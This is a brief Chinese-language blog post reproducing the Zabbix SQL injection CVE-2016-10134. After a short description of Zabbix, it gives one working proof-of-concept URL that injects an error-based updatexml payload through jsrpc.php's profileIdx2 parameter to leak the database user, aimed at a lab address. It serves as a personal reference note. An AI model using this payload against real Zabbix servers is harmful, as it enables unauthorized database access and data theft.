Zabbix SQL注入漏洞（CVE-2016-10134）复现 and Poc

Please enable Javascript to view the contents

📅 2019年05月06日 · ☕ 1 分钟 · ✍️ IceKam · 👀... 阅读

介绍

Zabbix是一个开源监控软件工具，适用于各种IT组件，包括网络，服务器，虚拟机和云服务。

Zabbix提供监控指标，其中包括网络利用率，CPU负载和磁盘空间消耗 ,rd模式。


http://172.21.0.5/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

Zabbix SQL注入漏洞（CVE-2016-10134）

很基础，收藏留存。

您的鼓励是我最大的动力

作者

IceKam

茶艺品鉴砖家，低端码字人口。